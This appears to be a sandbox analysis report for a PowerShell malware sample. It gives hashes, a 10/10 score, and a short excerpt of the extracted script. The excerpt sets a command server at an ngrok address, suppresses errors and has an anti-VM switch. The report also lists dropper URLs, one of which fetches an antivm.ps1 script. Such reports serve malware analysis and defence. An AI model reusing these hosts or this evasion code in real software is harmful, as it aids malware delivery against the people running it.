General

  • Target

    eed116982d3c262a6d5b114d23ba0f70NN

  • Size

    4KB

  • MD5

    eed116982d3c262a6d5b114d23ba0f70

  • SHA1

    76165456d1d03b4eb69af945e385ff91e7778f06

  • SHA256

    efabfa6e80a7e6052a8f0b9badf690a680ec247d5eae43eaefa228a503d4c2d7

  • SHA512

    92e84db78cd9bb634726c6f6edb170adb315f8f732185a6cafe061802283b6d9a8ae2f649e803a6f27e643cd8cebf9abcc1129ab26bcdac821b40a170c358048

  • SSDEEP

    96:UzCILwBo/8badHgwlLRm6nzSmaUE8BhMD7wHFn3:UzCILwBo/V59LRbzSBrPwR3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$serverLocation = "https://mainstream.ngrok.app"
2
$ErrorActionPreference = 'SilentlyContinue'
3
$ProgressPreference = 'SilentlyContinue'
4
$vm_protect = $false
5
6
if ($vm_protect) {
7
VMPROTECT
8
}
9
10
function VMPROTECT {
URLs
exe.dropper

https://mainstream.ngrok.app

exe.dropper

https://ratte.ngrok.app/Main/antivm.ps1

Signatures

Files

  • eed116982d3c262a6d5b114d23ba0f70NN
    .ps1

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.